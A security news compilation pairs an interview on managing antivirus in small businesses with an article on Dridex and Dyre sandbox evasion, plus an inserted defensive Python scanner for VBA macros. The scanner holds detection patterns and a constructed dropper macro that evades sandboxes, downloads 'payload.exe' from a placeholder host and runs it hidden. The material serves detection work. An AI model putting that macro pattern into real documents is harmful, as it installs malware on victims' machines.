
The Need for a Security Mindset

Keeping antivirus software protection current on all company-owned computing devices has become an essential business practice. That’s not a simple endeavor.

ThirdCertainty recently sat down with Andy Hayter, security evangelist at antivirus vendor G Data Software, to discuss the intricacies of managing antivirus solutions effectively, particularly in small and mid-sized companies. (Answers edited for clarity and length.)

3C: With hackers updating their virus signatures almost minute-to-minute, why do companies still need antivirus protection?

Hayter: One of the myths out there today is that antivirus is dead. But the good news is that antivirus software today isn’t just signature-based. It includes heuristic technology that looks at the characteristics of a piece of software executing on your computer.

So in many cases, even though a particular piece of malware may not necessarily have been identified through a signature, it can easily be identified through the heuristics.


3C: As a business owner or manager, if I’m implementing my antivirus solution on my own, what should I know?

Andy Hayter, G Data Software security evangelist

Hayter: Having a management interface is important, so that you can manage all devices and deploy the antivirus software out to all your devices and keep it maintained and updated. Your vendor should offer training to your key personnel.

It’s important for them to understand how to manage threats, and understand what’s going on in your network environment from a malicious software perspective.

3C: Is relying on my IT department to take charge of security wise?

Hayter: Most small and mid-sized companies are going to look at the IT department to do this. They are not large enough to have a separate security function. The CEO and CFO still must fully understand the impact malware can have.

3C: What about outsourcing security?

Hayter: Many smaller companies don’t have the time or resources to get someone up to speed and trained, or even multiple people trained, because this is a 24-hour type of situation. So more companies are looking at managed security service (MSS) providers to take this on for them. This entails a solution that a third party manages remotely through a remote management console.

So it depends on whether the business has the time and the money to train people or wants to outsource this to a professional whose business is security. Either way, you still need to train your IT staff so they know the fundamentals of security and can protect the business in an emergency.

3C: So I can’t just outsource and wash my hands of security?

Hayter: No. You cannot wash your hands of security. Your managed security service provider is there for you, but you still have to understand the basics. You still have to perform the training. And you still are the person on site to talk to your employees about situations that might occur at 8:30 in the morning when they log on to their PC and get a strange e-mail.

3C: Establishing a security mind-set for my company is a day-to-day thing?

Hayter: Right. If you do outsource your security, you cannot just forget about it and pray that it’s done completely. You still need to train your employees and help them understand that bad things can happen to them.

Financial Malware Uses Macros to Infect

A new breed of financially focused malware has cropped up, using new tactics to evade detection and infect harder-to-compromise systems.

The Dyre botnet has successfully compromised tens of thousands of victims in North America. Another banking trojan, Dridex, has successfully compromised thousands of systems in Europe and is increasingly targeting companies and users in the U.S. by sending Word documents carrying malicious macro scripts capable of installing the malware.


Cloud-based security provider Proofpoint has focused on Dridex since it appeared late last year, tracking efforts by the groups behind it to target companies with Dridex-laden spam. The attackers send out waves of spam every two or three days, using anywhere from two e-mail templates to more than 1,000, depending on the group behind the attack.

The attacks usually last no longer than five hours, and few, if any, antivirus scanners detect the malware in time, says Wayne Huang, vice president of engineering at Proofpoint.

“I would say that they are persistent, but they are not APT (an advanced persistent threat) in that they are not focusing on certain organizations,” he says. “They spread malware primarily to monetize.”

The rapidly changing templates and the use of macros within Word documents are just two of the techniques that Dridex uses to be an efficient infector. More recent versions of the banking malware have used images to track the number of downloads, and the developers also have added features to foil detection and analysis by automated systems.

A number of anti-malware systems open suspicious files or run potentially questionable code in a virtual environment and watch for malicious behavior. Attackers, however, have found ways to detect whether their code is running in such a “sandbox.” Early attempts simply slept for an hour or a day before doing anything, because automated systems typically executed the code for only a few minutes before giving up.

Most current efforts, however, look for anomalies in the system on which the program is running. The developers behind the Dyre malware, for example, used a simple command to count the number of processor cores. Many virtual environments allocate only a single core to each guest for efficiency, while multi-core systems are now ubiquitous on real desktops, so a single-core machine is a strong hint that the code is being analyzed.

Dridex, however, took a simpler tack. Because analysis systems tend to open the suspicious file, wait for any anomalous activity and then terminate it, the Dridex macro is written to execute only when the malicious Word document is closed; a sandbox that never closes the document never sees the payload.
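All three sandbox checks just described (a long sleep, a processor-core count, and firing only from the document-close event) leave traces in the macro source itself, which a mail gateway or an analyst can inspect before the document is ever opened. The following Python script is an added example, not code from this article or from Proofpoint: it scans VBA source text for auto-execute procedure names and for those evasion indicators, reports each hit by line, and scores the module. The two macro listings are constructed samples; the specific API names it looks for (Environ("NUMBER_OF_PROCESSORS"), Sleep, MSXML2.XMLHTTP, Shell) are assumptions about how such macros are commonly written, not details taken from the Dridex or Dyre samples discussed above.

```python
"""Static triage of VBA macro source for auto-execute triggers and the
sandbox-evasion tricks described in the text: sleep delays, processor-core
counting, and running only from the document-close event.

Added example. The indicator patterns are assumptions about how such macros
are typically written, not signatures taken from the article."""
import re
from dataclasses import dataclass, field

# Procedure names Word invokes on its own. The "close" entries are the ones a
# sandbox that opens the file, waits, and then kills Word will never fire.
AUTO_EXEC_TRIGGERS = {
    "autoopen": "open",
    "document_open": "open",
    "autoexec": "open",
    "autoclose": "close",
    "document_close": "close",
}

# One regex per indicator, matched line by line so hits can be reported by line.
EVASION_PATTERNS = {
    # stall until an automated run has timed out
    "sleep_delay": re.compile(r"\b(?:Sleep|Application\.Wait)\b", re.IGNORECASE),
    # Dyre-style core count: a single-core guest is probably a sandbox
    "cpu_core_count": re.compile(
        r"NUMBER_OF_PROCESSORS|Win32_Processor|NumberOfCores|NumberOfLogicalProcessors",
        re.IGNORECASE),
    # second-stage download
    "downloader": re.compile(
        r"URLDownloadToFile|MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest", re.IGNORECASE),
    # running whatever was downloaded
    "execution": re.compile(r"\bShell\b|CreateProcess", re.IGNORECASE),
}

# Sub/Function declarations, optionally prefixed with Private/Public.
PROC_RE = re.compile(
    r"^\s*(?:(?:Private|Public)\s+)?(?:Sub|Function)\s+(\w+)",
    re.IGNORECASE | re.MULTILINE)


@dataclass
class TriageResult:
    triggers: dict = field(default_factory=dict)    # proc name -> "open" | "close"
    indicators: dict = field(default_factory=dict)  # indicator -> [line numbers]
    score: int = 0


def triage_vba(source: str) -> TriageResult:
    """Return auto-exec triggers, evasion indicators and a crude score for one module."""
    result = TriageResult()
    for match in PROC_RE.finditer(source):
        name = match.group(1)
        when = AUTO_EXEC_TRIGGERS.get(name.lower())
        if when:
            result.triggers[name] = when
    for lineno, line in enumerate(source.splitlines(), start=1):
        for label, pattern in EVASION_PATTERNS.items():
            if pattern.search(line):
                result.indicators.setdefault(label, []).append(lineno)
    score = 0
    if result.triggers:
        score += 2                      # runs without the user doing anything
    if "close" in result.triggers.values():
        score += 1                      # deliberately dodges open-and-wait analysis
    score += len(result.indicators)     # one point per distinct indicator
    if {"downloader", "execution"}.issubset(result.indicators):
        score += 2                      # fetch-then-run is the classic dropper shape
    result.score = score
    return result


def verdict(result: TriageResult) -> str:
    """Map the score to a triage label; thresholds are an assumption for this example."""
    if result.score >= 5:
        return "malicious"
    if result.score >= 2:
        return "suspicious"
    return "clean"


# Constructed sample, not a real Dridex macro: runs from the close event, bails
# out on a single-core machine, sleeps a minute, then fetches and runs a file.
MALICIOUS_SAMPLE = '''\
Private Declare PtrSafe Function Sleep Lib "kernel32" (ByVal ms As Long)

Sub Document_Close()
    Dim cores As String
    cores = Environ("NUMBER_OF_PROCESSORS")
    If CInt(cores) < 2 Then Exit Sub
    Sleep 60000
    Dim h As Object
    Set h = CreateObject("MSXML2.XMLHTTP")
    h.Open "GET", "http://example.invalid/payload.exe", False
    h.Send
    Shell "C:\\Users\\Public\\payload.exe", vbHide
End Sub
'''

# Constructed benign sample: an ordinary formatting macro with no auto trigger.
BENIGN_SAMPLE = '''\
Sub FormatReport()
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub
'''

if __name__ == "__main__":
    for name, src in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        r = triage_vba(src)
        print(f"{name}: {verdict(r)} (score {r.score}) "
              f"triggers={r.triggers} indicators={r.indicators}")
```

On a real document the VBA text first has to be pulled out of the OLE or OOXML container (a macro extractor such as olevba from the oletools package does this); the scanner above only works on the extracted source. The close-event trigger is also the reason a dynamic sandbox should script closing the document, not just opening it, before declaring a file clean.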

The evolution of Dridex has made it an effective vehicle for attacks, says Matt Huang, vice president of product management at Proofpoint.

“They have been really mutating their techniques, especially to avoid sandbox detection,” he says. “From very early on, they would change e-mail subjects and file titles. Now, we see a greater variety of techniques.”

A single attack often will result in hundreds of thousands of e-mails being sent out. The attackers have at least 1.3 billion e-mail addresses from which to choose, Huang says.

The attackers also are beginning to zero in on other financial targets, such as cryptocurrencies. In some cases, Dridex has downloaded a trojan known as Pony that can steal more than 30 different cryptocurrencies, such as Bitcoin, from a dozen different types of digital wallets.

“Recently, they have been using Pony to steal wallets, because the use of virtual currency has picked up,” Huang says. “They have been quite successful.”